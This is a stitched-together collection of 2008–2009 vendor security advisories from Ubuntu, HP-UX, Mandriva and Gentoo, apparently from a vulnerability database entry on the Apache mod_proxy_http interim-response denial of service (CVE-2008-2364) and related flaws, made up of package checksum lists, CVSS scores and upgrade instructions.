Size/MD5: 102579 71b53faad8570c6ad92c0fc5e6aa4dfb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2-0ubuntu5.1.dsc
Size/MD5: 2305 558c2bdbbdb899c71197683df45fc75d
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kde4libs_4.2.2.orig.tar.gz
Size/MD5: 12335659 83d6a0d59e79873bbe0a5a90ef23f27e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1.diff.gz
Size/MD5: 724421 c73109ccdfb1d6c01eda7b6c0b4934a2
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1.dsc
Size/MD5: 2342 8ee55c88b43902a23d127d14917511be
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1.orig.tar.gz
Size/MD5: 18639393 4bcfee29b0f939415791f5032a72e7b0
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-data_4.2.2-0ubuntu5.1_all.deb
Size/MD5: 1991468 99747c4c57d32b9d7477ff0c418cbd1b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10.dfsg.1-1ubuntu8.1_all.deb
Size/MD5: 6751880 d7dfaf8fc4b8e658722a2beaaa3403d6
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.dfsg.1-1ubuntu8.1_all.deb
Size/MD5: 2272 fcf90c11a73566f41fd0eb5b54c4ee8f
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 280594 b0ccdd311755d4d73e4ae5c14b749c41
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 44148058 a7db92bd1bcf982314b0b89c1651a39b
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 1091210 b5430381f4c37424295eed580303a58c
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 7069750 e38c9e852339ef6c2134421765ed4eeb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 102446 4370939a24e6e0783da79e4781a63b33
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_amd64.deb
Size/MD5: 611834 f61383e1830f92ed8ce2331ce4b8a366
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 27110136 a617a5b148e5e78f3b8523198869c8b0
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 1360082 d22364103ba04d238e9c6ce6632132c4
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_amd64.deb
Size/MD5: 10782444 6fea32d8dd41bfae44c2c6392e74928d
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 268936 55d68e9bbd600e288721479d2b90e16e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 43456236 4fe778549740544eb1304cfba184d899
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 1090396 db9306ddd8d1029b523ef398cb0acfcb
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 6775516 374ea41072ec5221589c5f022f648434
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 126910 e4dbfd8386ea15fb613d7d56c971fd5e
http://security.ubuntu.com/ubuntu/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_i386.deb
Size/MD5: 569616 b83e42d5f01e5e64ebb376820855771d
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 26382844 e88d283fb997e17aa96e8d7b0d6ca41e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 1394762 97bb37a8d0c8d60e278b671e14ee678b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_i386.deb
Size/MD5: 10006808 1e023a799c01aa6826ec770afbd68c90
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 275124 9779e3644ebfe8d78b7a4e3ffbf911f1
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 43588032 45eed1b291e0bd64bbbbbb3310d0f627
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 1092816 f7f13887c87e7ff27ae68785010e6720
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 6849342 b864a2c9fa03c050581a3102194adc1b
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 102444 7fee9a94b561c3fc03eac8de41b9ced5
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_lpia.deb
Size/MD5: 599800 9a75c9c7a63848de9c911e45370556e4
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 26385234 73d6c254de10b86ee1c4e042ad6af402
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 1356828 d361a888c74d0c508876404cbcad4af5
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_lpia.deb
Size/MD5: 10020040 4f9bc1c45c3dd04185de146cb1d1f4fd
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 269632 341b2a4e4e1dc63aa429a525ac5a2cd4
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 43129040 2288d1735b6c017024e04702626a139d
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 1089846 b7ce576938df67875e4cd0e61c86f9cd
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 6201830 fa9f8330ab5390563e78f2dbdce2e3e5
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 102426 1cc244e9262435b1779586108b2388af
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_powerpc.deb
Size/MD5: 554306 bc91379d58e2cc610671b092fcacbeb5
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 27928600 45b14e2a27fba6bd686880d8db9df586
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 1369304 3d402371b107efa1a35551ebf4d5b502
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_powerpc.deb
Size/MD5: 10611572 a85ed7be116a175427d9da3ab4d1325f
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs-bin_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 249574 e2e1b89231e89f4756c5abf11fc3f336
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dbg_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 40331324 5505211faa8ff8b08be22e533dd49dff
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5-dev_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 1086200 4f8049b2f341873fd26ecb2b03b1ba21
http://ports.ubuntu.com/pool/main/k/kde4libs/kdelibs5_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 5941632 a62ca018afa73d9d42feabd7cd12e534
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma-dev_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 102468 6e6a2473358e87b7866b4844659d5a85
http://ports.ubuntu.com/pool/main/k/kde4libs/libplasma3_4.2.2-0ubuntu5.1_sparc.deb
Size/MD5: 529504 cc978af233ef52e1211e52ad00199cb0
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 25158764 020573ace30e4a179891aec0abe60149
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 1356898 a5c04c3bfce3e79bac6ad5be6b97e212
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10.dfsg.1-1ubuntu8.1_sparc.deb
Size/MD5: 9662850 c7a7204aede16a1951ec1af8a26b4d1c
|
|
var-200705-0688
|
The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses. Hitachi Web Server contains a vulnerability that could lead to a denial of service (DoS) condition when using it as a reverse proxy due to excessive memory usage.The server could fall into a denial of service (DoS) state when continuously receiving fraudulent responses from backend Web servers. The Apache 'mod_proxy_http' module is prone to a denial-of-service vulnerability that affects the processing of interim responses.
Attackers may exploit this issue to cause denial-of-service conditions.
Reportedly, the issue affects Apache 2.2.8 and 2.0.63; other versions may also be affected. Apple Mac OS X is prone to multiple security vulnerabilities that have been addressed in Security Update 2008-007.
The security update addresses a total of 11 new vulnerabilities that affect the ColorSync, CUPS, Finder, launchd, Networking, Postfix, PSNormalizer, rlogin, Script Editor, and Weblog components of Mac OS X. The advisory also contains security updates for 30 previously reported issues.
NOTE: This BID is being retired; the following individual records have been created to better document these issues:
31716 Apple Script Editor Unspecified Insecure Temporary File Creation Vulnerability
31718 Apple Mac OS X Server Weblog Access Control List Security Bypass Vulnerability
31708 Apple Mac OS X 'hosts.equiv' Security Bypass Vulnerability
31721 Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability
31719 Apple PSNormalizer PostScript Buffer Overflow Vulnerability
31711 Apple Mac OS X 'configd' EAPOLController Plugin Local Heap Based Buffer Overflow Vulnerability
31715 Apple Mac OS X ColorSync ICC Profile Remote Buffer Overflow Vulnerability
31720 Apple Finder Denial of Service Vulnerability
31707 Apple OS X QuickLook Excel File Integer Overflow Vulnerability
31688 CUPS 'HP-GL/2' Filter Remote Code Execution Vulnerability
31722 Apple Mac OS X 10.5 'launchd' Unspecified Security Bypass Vulnerability. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are contained in the Apache Web Server Suite.
References: CVE-2007-6420, CVE-2008-1232, CVE-2008-1947, CVE-2008-2364, CVE-2008-2370, CVE-2008-2938, CVE-2008-2939, CVE-2008-3658
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servelet Engine v5.5.27.01.01 or earlier
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
CVE-2007-6420 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1232 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1947 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2364 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2370 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2938 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2939 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-3658 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
URL: http://software.hp.com
Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
MANUAL ACTIONS: Yes - Update
Install Apache-based Web Server or Tomcat-based Servelet Engine from the Apache Web Server Suite v3.02 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
hpuxwsTOMCAT.TOMCAT
hpuxwsWEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.23
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.31
==================
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 2 February 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSYhX8+AfOvwtKn1ZEQJxcACeJa8lt5TkhV5qnaGRTaBh4kqHutgAoJbH
XCe08aGCzEZj/q4n91JQnhq6
=XImF
-----END PGP SIGNATURE-----
.
This update also provides HTTP/1.1 compliance fixes.
The updated packages have been patched to prevent this issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364
_______________________________________________________________________
Updated Packages:
Corporate 3.0:
532973a116bcdf63ed72042b819b59cc corporate/3.0/i586/apache2-2.0.48-6.19.C30mdk.i586.rpm
e2913623f1876d02e426bbca997f3435 corporate/3.0/i586/apache2-common-2.0.48-6.19.C30mdk.i586.rpm
2e583f46edd8e83d8071e1912fbcced6 corporate/3.0/i586/apache2-devel-2.0.48-6.19.C30mdk.i586.rpm
83b6d9adea62a2c186f2acfb7372a8f0 corporate/3.0/i586/apache2-manual-2.0.48-6.19.C30mdk.i586.rpm
f797d9dd78f6a75328f3156f4d97de54 corporate/3.0/i586/apache2-mod_cache-2.0.48-6.19.C30mdk.i586.rpm
1e13b9cf9ed69f69f1700d89e7b0a625 corporate/3.0/i586/apache2-mod_dav-2.0.48-6.19.C30mdk.i586.rpm
eeacd8fa60a510fe23a949303aefa934 corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.19.C30mdk.i586.rpm
12978be0a831fb2164e8663e0aa96c16 corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.i586.rpm
ff7133c4d2f3a18d5ca86398b6a3b482 corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.19.C30mdk.i586.rpm
de43091c378ef1b0a465f409d4198c7d corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.19.C30mdk.i586.rpm
2a884bf3c648fe6e45bd1858e7ac8fca corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.i586.rpm
435c1058b34b3e5603e8502315d3f1be corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.19.C30mdk.i586.rpm
5a54d1929057b311ab83863fcfc6785b corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.19.C30mdk.i586.rpm
37bb90e385c1571579d604120cd1c1d4 corporate/3.0/i586/apache2-modules-2.0.48-6.19.C30mdk.i586.rpm
377a8d1250fb1276e0c52fe89b63775a corporate/3.0/i586/apache2-source-2.0.48-6.19.C30mdk.i586.rpm
2c6db35de4997018b043181957072182 corporate/3.0/i586/libapr0-2.0.48-6.19.C30mdk.i586.rpm
30da5c4069b7b8ea5b3bb13734ca0058 corporate/3.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm
Corporate 3.0/X86_64:
43cb9996c4ad55ead2a2bba2a618b939 corporate/3.0/x86_64/apache2-2.0.48-6.19.C30mdk.x86_64.rpm
898f1420c5fe218c748281c238da9d00 corporate/3.0/x86_64/apache2-common-2.0.48-6.19.C30mdk.x86_64.rpm
b7ca472734ea5776cfecf1dd2315f71d corporate/3.0/x86_64/apache2-devel-2.0.48-6.19.C30mdk.x86_64.rpm
8ebd24059163cd8f8e22eb0203682e41 corporate/3.0/x86_64/apache2-manual-2.0.48-6.19.C30mdk.x86_64.rpm
ac6f64c5aabbf463be38023dfb2e30e0 corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.19.C30mdk.x86_64.rpm
2e66000edd688d563645ecf526724899 corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.19.C30mdk.x86_64.rpm
d82ba16ad19ebfbb412f033537fe7dfb corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.19.C30mdk.x86_64.rpm
e83174382435df2220f7563545543342 corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.x86_64.rpm
af5d024a4cff0c216d0c02dcbe08ab83 corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.19.C30mdk.x86_64.rpm
b6a74826d456381f9c3807d7cdaef8ff corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.19.C30mdk.x86_64.rpm
3e0c99c91a186db1650ab277fb266ddf corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.x86_64.rpm
5bcf1224653b851df20d07d6fbb248b6 corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.19.C30mdk.x86_64.rpm
c07af351ea84b7d8a0b0de879c9aad2e corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.19.C30mdk.x86_64.rpm
fa40774c92468aa0080979674ff473c5 corporate/3.0/x86_64/apache2-modules-2.0.48-6.19.C30mdk.x86_64.rpm
a387e498b01b876ee31066aa3a73970a corporate/3.0/x86_64/apache2-source-2.0.48-6.19.C30mdk.x86_64.rpm
659d44dc9615de5b556d35425d628bf7 corporate/3.0/x86_64/lib64apr0-2.0.48-6.19.C30mdk.x86_64.rpm
30da5c4069b7b8ea5b3bb13734ca0058 corporate/3.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm
Multi Network Firewall 2.0:
93eef0301be074129e8c8f67381c09ad mnf/2.0/i586/apache2-2.0.48-6.19.C30mdk.i586.rpm
0dd927e4efb8dc43f2168227d22c1407 mnf/2.0/i586/apache2-common-2.0.48-6.19.C30mdk.i586.rpm
366c8a236e33babca8447b3c3f926c83 mnf/2.0/i586/apache2-devel-2.0.48-6.19.C30mdk.i586.rpm
73490cae06d07885512ff28fb24c1d6c mnf/2.0/i586/apache2-manual-2.0.48-6.19.C30mdk.i586.rpm
8bf01fed207bf8ae9c265be3d3f0e0f5 mnf/2.0/i586/apache2-mod_cache-2.0.48-6.19.C30mdk.i586.rpm
b06f622b9c96bfa10cdc4d2067e5826f mnf/2.0/i586/apache2-mod_dav-2.0.48-6.19.C30mdk.i586.rpm
c5600da4764bcb84733c16034871ced1 mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.19.C30mdk.i586.rpm
cccdb0578c7443e46154a8f64b78a86b mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.19.C30mdk.i586.rpm
67fb4bcf03bef82c78fb42ec3de85b55 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.19.C30mdk.i586.rpm
20cb9f0132cd5181f6cff7699373d488 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.19.C30mdk.i586.rpm
1f0f71765b82dd9086c99a2ec98ce458 mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.19.C30mdk.i586.rpm
26d8d7db3f8a8ed9dd22add69cc908cd mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.19.C30mdk.i586.rpm
538e1d3b6eab0b6770de516d9c6e59e4 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.19.C30mdk.i586.rpm
82674d6c664adb4e9a8539703ee113d7 mnf/2.0/i586/apache2-modules-2.0.48-6.19.C30mdk.i586.rpm
d1dc24f4698a7cef16c292ba19302ca1 mnf/2.0/i586/apache2-source-2.0.48-6.19.C30mdk.i586.rpm
b83a8c4eda842c3e358d16d22febbe80 mnf/2.0/i586/libapr0-2.0.48-6.19.C30mdk.i586.rpm
5ff603859246c39086f9b6ad300f97c6 mnf/2.0/SRPMS/apache2-2.0.48-6.19.C30mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJOCuNmqjQ0CJFipgRAt+pAKDO9fruRTCR1580NTYdYmnky057aACdFVGo
NmJlapeQ2vPQcDIjsktx95s=
=5zLR
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200807-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Apache: Denial of Service
Date: July 09, 2008
Bugs: #222643, #227111
ID: 200807-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Apache might lead to a Denial of Service.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-servers/apache < 2.2.9 >= 2.2.9
Description
===========
Multiple vulnerabilities have been discovered in Apache:
* Dustin Kirkland reported that the mod_ssl module can leak memory
when the client reports support for a compression algorithm
(CVE-2008-1678).
* sp3x of SecurityReason reported a Cross-Site Request Forgery
vulnerability in the balancer-manager in the mod_proxy_balancer
module (CVE-2007-6420).
Impact
======
A remote attacker could exploit these vulnerabilities by connecting to
an Apache httpd, by causing an Apache proxy server to connect to a
malicious server, or by enticing a balancer administrator to connect to
a specially-crafted URL, resulting in a Denial of Service of the Apache
daemon.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Apache users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/apache-2.2.9"
References
==========
[ 1 ] CVE-2007-6420
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6420
[ 2 ] CVE-2008-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678
